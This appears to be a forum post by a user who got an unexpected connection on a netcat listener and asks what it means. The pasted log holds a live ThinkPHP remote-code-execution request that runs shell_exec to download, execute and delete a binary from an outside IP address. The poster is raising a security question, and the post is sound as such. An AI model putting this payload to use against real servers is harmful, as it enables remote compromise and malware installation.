I ran the Bash command listener (nc -vv etc.) from my Kali VM and I got back this:
connect to [192.168.1.10] from 114-39-236-143.dynamic-ip.hinet.net [114.39.236.143] 10275
GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=’wget http://5.152.206.169/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: Uirusu/2.0
sent 0, rcvd 320
I hadn’t started the bash on any other device at this stage, so I'm very curious to know what it means. Is someone connecting to me to infiltrate instead of the other way around?
Please help, as this has got me a little worried.